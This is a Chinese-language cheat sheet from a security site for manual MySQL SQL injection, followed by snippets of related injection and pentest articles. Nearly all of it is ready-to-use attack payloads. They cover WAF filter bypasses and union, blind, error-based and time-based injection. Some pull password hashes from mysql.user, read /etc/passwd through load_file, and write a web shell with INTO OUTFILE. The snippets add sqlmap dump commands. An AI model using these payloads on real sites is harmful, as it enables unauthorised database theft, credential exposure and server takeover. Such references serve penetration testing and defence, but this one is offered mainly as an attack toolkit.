网安 - 专业的网络安全产业、社区、知识平台

Mysql 手工注入速查表 | 建议收藏

一颗小胡椒2021-08-26 09:00:00

绕 WAF 

过滤空格:

+,%2B,%20,%09,%0d,%0A,/**/,/*tuns*/

使用 like、IN、NOT IN 替换 =:

script.php?par=1 and substring(Version(),1,1)like(5)script.php?par=1 and substring(Version(),1,1)not in(4,3)script.php?par=1 and substring(Version(),1,1)in(4,3)

使用 substring 函数:

script.php?par=1 and right(left(version(),1),1)=5script.php?par=1 and left(version(),1)=4script.php?par=1 and ascii(lower(substr(Version(),1,1)))=51script.php?par=1 and (select mid(version(),1,1)=4)

无需空格之盲注:

script.php?par=(1)and(lower(substring((select(pass)from(mysql.user)where(user="user")),1,1))='b')script.php?par='1'and(exists(select(1)from(users)where(ascii(lower(substring(user_id,1,1))))like(50) ))and'1'<'2'

无需空格之联合注入:

script.php?par=a')union(select'1',2,table_name,(4) from(information_schema.tables))%23script.php?par=(-1)union(select(table_name),2,3,4,5,(6)from(informa tion_schema.tables))/*

无需逗号之盲注:

script.php?par=1 and substring((select password from user where Host='localhost') FROM 1 FOR 1)>'f'script.php?par=1 and mid((select password from user where Host='localhost') FROM 1 FOR 1)>'f'script.php?par=(1)and(case when ascii(substring((select password from user limit 1 offset 0) from 1 for 1))>100 then 1 else (select 1 union select 2)end)

无需逗号联合注入:

script.php?par=1 union select 1/*!,*/2/*!,*/3/*!,*/4/*!,*/5/*!,*/6--

大小写绕过:

script.php?par=1 uNion SeLect 1

WAF 绕过:

script.php?par=1/*!limit+0+union+select+version()+from+tables*/ # %0D%0A/artists.php?artist=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user# /*!0hUserId=22768&FromDate=1&ToDate=1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-&sendbutton1=Get+Statement# news.php?id=1+un/**/ion+se/**/lect+1,2,3--# 大小写绕过news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--# 二次过滤http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--# URL编码http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--

数据库名字中的连字符:

script.php?par=1 union select version() from `db-forum`.forum_user

绕过 magic_quotes (双重查询):

script.php?par=-1 union select 1,2,0x2D3120756E696F6E2073656C656374202731272F2A,4 ,5,6,7,8,9,10,11,12,13/*2D3120756E696F6E2073656C656374202731272F2A ==> -1 union select '1'/*

连接字符串:

select * from users where name = 'te'+'st';select * from users where name = 'te'='st';"1"'2'"3"  '1'"2"'3'

注释符

/* 多行 最后使用过 */ 结尾

- 单行 后面必须跟 空格

# 单行 (%23)

系统变量
@@basedir@@datadir@@tmpdir@@version_compile_os@@version_comment -  MySQL 服务器的当前版本。@@version_compile_machine - 编译此版本 MySQL 服务器的架构类型@@log_error 错误日志路径SYSTEM_USER()SESSION_USER()CURRENT_USER()

group_concat 输出内容

查找字段:

group_concat (concat_ws) (0x3a, table_sche table_name, column_name)) + from + information_schema.columns + where + column_name + like + '% qwe%'

获取前一百字段:

mid(group_concat(concat_ws(0x3a,table_schema,table _name,column_name)),100,1024),2,3,4,5,6+from+information_schema.columns

获取表名:

group_concat(table_name)+from+information_schema.tables+where+table_schema!=0x696E666F726D6174696F6E5F736368656D61

获取除系统表外的其他表:

group_concat(table_name+order+by+1)+from+information_schema.tables+where+table_schema!='information_schema'group_concat(table_name+order+by+1)+from+information_schema.tables+where+table_schema!='information_schema'+and+table_name>'last_table'

盲注,字符匹配:

group_concat(table_name)+from+information_schema.tables+where+ASCII(LOWER(table_name))=99

使用 limit 获取表名:

group_concat(table_name)+from+infor mation_schema.tables+group+by+table_schema+limit+1 ,1

分列显示

group_concat(concat_ws(0x3a,user,password,file_priv))+from+mysql.user+group+by+file_priv+limit+1,1
使用编码函数
script.php?par=1 union select cast(version()+as+binary)script.php?par=1 union select convert(version(),binary)script.php?par=1 union select convert(version()+using+latin1)script.php?par=1 union select convert(version()+using+binary)script.php?par=1 union select aes_decrypt(aes_encrypt(version(),1),1)script.php?par=1 union select unhex(hex(version()))

报错注入

name_const (MySQL 5.0.12 > 5.0.64)

(select name_const((select 1),1)) - truescript.php?par=1 or(1,2)=(select*from(select name_const(version(),1),name_const(version(),1))a)script.php?par=1 union select * from(select * from(select NAME_CONST((select column_name from information_schema.columns limit 1), 14)d) as t join (select NAME_CONST((select column_name from information_schema.columns limit 1), 14)e) b)a--

ExtractValue (MySQL 5.1>=)

script.php?par=1 AND extractvalue(1,concat(0x3a,(select pass from users limit 0,1)))==>XPATH syntax error: ':200820e3227815ed1756a6b531e7e0d'

rand (Mysql >= 4.1)

script.php?par=(1)and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from TABLE group by x)a)--script.php?par=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))--script.php?par=1 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))--script.php?par=1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select pass from users limit 1),1,64),floor(rand(0)*2)))--script.php?par=1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand(0)*2)) x from (select 1 union select 2)a group by x limit 1) --script.php?par=1 union select 1,2,passwd from users where id=1 and row(1,1)>(select count(*),concat( (select users.passwd) ,0x3a,floor(rand()*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) --

查询列名

MySQL >= 4.1

# Selectscript.php?par=(1)and(SELECT * from xek.users)=(1)==>Operand should contain 4 column(s)script.php?par=1 and (1,2,3,4) = (SELECT * from xek.users UNION SELECT 1%0,2,3,4 LIMIT 1)==>Column 'id' cannot be null# Insert、Update、ReplaceINSERT INTO table (`a`,`b`,`c`) VALUES ('1',if(1=1,NULL,'2'),'3')Column 'name' cannot be null

MySQL 5

-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b)a==>#1060 - Duplicate column name 'id'-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a==>#1060 - Duplicate column name 'name'-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id,name))aPROCEDURE ANALYZE()script.php? par = 1 limit 0,1 PROCEDURE ANALYZE()

没有列名的数据查询

MySql => 4.1.х 

script.php?par=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14script.php?par=-1 union select * from users,(select 1)ascript.php?par=-1 union select * from users,(select 1,2)ascript.php?par=-1 union select * from users,(select 1,2,3)a.....script.php?par=-1 union select * from users,(select 1,2,3,4,5,6,7,8,9)ascript.php?par=-1 union select * from (select 1,2,3,4,5)b,users,(select 1,2,3,4)ascript.php?par=-1 union select * from (select 1,2,3,4)b,users,(select 1,2,3,4,5)ascript.php?par=-1 union select * from (select 1,2,3)b,users,(select 1,2,3,4,5,6)ascript.php?par=-1 union select * from (select 1,2)b,users,(select 1,2,3,4,5,6,7)ascript.php?par=-1 union select * from (select 1)b,users,(select 1,2,3,4,5,6,7,8)a

MySql =>4.0

script.php?par=1 union select *,1,2,3,4,5,6 from usersscript.php?par=1 union select 6,users.*,2,3,4,5,1 from users

Order 注入

# 盲注:script.php?par=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))# (ExtractValue)script.php?par=id,ExtractValue(1,concat(0x5c,(sele ct table_name from information_schema.tables limit 1)))--# (rand)script.php?par=(select 1 from (select count(0),concat((select version()),floor(rand(0)*2)) from information_schema.tables group by 2 limit 1)a)--# (name_const)script.php?par=(select*from(select name_const(version(),1),name_const(version(),1))a)

limit 注入

script.php?par=1,111111111 union select version(),2,3,4--script.php?par=111111111 union select version(),2,3,4--

时间盲注

script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --

文件权限

读文件

script.php?par=1 and 1=if(load_file('/etc/passwd') is not NULL,1,2)--+# 绕过读取文件超过 64 字符的情况?lol=123'+and+(select+1+from+(select+count(0),concat((select+mid(load_file('/etc/passwd'),1,64),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)?lol=123'+and+(select+1+from+(select+count(0),concat((select+mid(load_file('/etc/passwd'),65,128),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)

写文件

script.php?par=1 limit 1 into outfile '/path/to/shell.php' lines terminated by ""--+script.php?par=1 limit 1 into outfile '/path/to/shell.php' fields terminated by '' optionally enclosed by ""--+

防御过滤

+, -, =, &, |, &&, ||, <=>, <=, >=, !=, <>, ^, *, <<, >>, <>, %, /, <, >, or not, and not, div, xor, or, and

漏洞检测

/?s=1/?s[]=1/?s=[1]/?s=1\/?s=1/' //?s=1/!1111'/
selectsubstring
本作品采用《CC 协议》,转载必须注明作者和本文链接
域渗透之外网打点到三层内网
2022-06-11 13:15:29
环境搭建1.项目介绍:本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点到内网横向渗透,最终获取整个内网权限。使用弱口令和暴力破解,没有爆破出弱口令用户。
SQL注入速查表与Oracle注入速查表总结
2022-01-05 06:05:48
一个经过完整而优秀开发的应用一般来说你是看不到错误提示的,所以你是没办法从Union攻击和错误中提取出数据的 一般盲注,你不能在页面中看到响应,但是你依然能同个HTTP状态码得知查询的结果 完全盲注,你无论怎么输入都完全看不到任何变化。你只能通过日志或者其它什么的来注入。虽然不怎么常见。
浅谈Sql注入总结笔记整理(超详细)
2023-03-06 15:46:23
id=3';对应的sql:select * from table where id=3' 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; 加and 1=1 ,URL:xxx.xxx.xxx/xxx.php?id=1' order by 3# 没有报错,说明存在3列爆出数据库:?id=-1' union select 1,group_concat,3 from information_schema.schemata#爆出数据表:?id=1' and extractvalue--+(爆字段)?
干货 | 2022年最详细的SQL注入总结笔记
2022-12-05 15:39:17
id=1' order by 3# 没有报错,说明存在3列。id=-1' union select 1,group_concat,3 from 数据库名.数据表名--+拓展一些其他函数:system_user() 系统用户名。updatexml函数:细节问题:extractvalue()基本一样,改个关键字updatexml即可,与extractvalue有个很大的区别实在末尾注入加上,如:,而extractvalue函数末尾不加1(数值)?
Mysql 手工注入速查表 | 建议收藏
2021-08-26 09:00:00
绕 WAF
适合新手的SQL手工注入总结
2022-12-12 10:26:11
虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要。这只是一个简单的总结,只是简单的为新手分享一下SQL注入,文中内容可能会存在错误,望大佬们手下留情!0x01 Mysql 手工注入1.1 联合注入?id=0' union select 1,2,3,group_concat from users --+#group_concat 可替换为 concat_ws
数据库注入提权总结
2022-08-09 16:49:49
select * from test where id=1 and ;布尔盲注常见的布尔盲注场景有两种,一是返回值只有True或False的类型,二是Order by盲注。查询结果正确,则延迟3秒,错误则无延时。笛卡尔积延时大约也是3秒HTTP头注入注入手法和上述相差不多,就是注入点发生了变化HTTP分割注入常见场景,登录处SQL语句如下
实战|从 SQL Server 注入到 getshell
2023-03-13 10:33:40
0x00 目标情况一个web站点111.*.*.63,只有一个登陆框,测试了没有注入,没有弱口令,扫描了全端口,没有发现什么有用的信息。0x02 找网站绝对路径判断是不是dba权限uname=test';if(1=(select?判断是否是站库分离uname=test';if?sqlmap查看建表成功,sqlmap -r 1.txt --dbms "Microsoft SQL Server" -D "tempdb" --tables查找网站文件并把路径写入到表tt_tmp. python sqlmap.py -r 1.txt --dbms="Microsoft SQL Server" --technique=S -D "tempdb" -T "tt_tmp" -C "tmp1" --dump -v 30x03 尝试在111.*.*.59主机getshell尝试写一句话先在下面的路径中写入txt文件验证网站路径到底是哪一个D:\bak\20170226\bak\20170403.2\webapp\Content\layer\. 依次写文件然后访问,在写入?
一次盲注漏洞的手工测试过程
2023-02-06 10:47:47
在一次测试中,发现一个输入单引号触发页面报错,而输入两个单引号触发页面跳转拒绝访问的页面,比如:name=' -> Redirecting to /Error.aspx pagename='' -> Redirecting to /AccessDenied.aspx page. 当输入基数个单引号时,页面跳转 Error.aspx,当输入偶数个单引号时,页面跳转至 AccessDenied.aspx,由于网站服务器是 asp.net + iis 架构的,根据经验判断,后端服务器应该是 MSSQL。因为数据库的名称是字符串,而将字符串转换为数字型时会报错,而今天这个环境下测试时发现:'+convert+' -> Redirecting to /Error.aspx page'+convert+' -> Redirecting to /AccessDenied.aspx page
干货 | MSSQL注入和漏洞利用姿势总结
2022-12-27 10:27:00
MSSQL注入和漏洞利用姿势总结
一颗小胡椒
暂无描述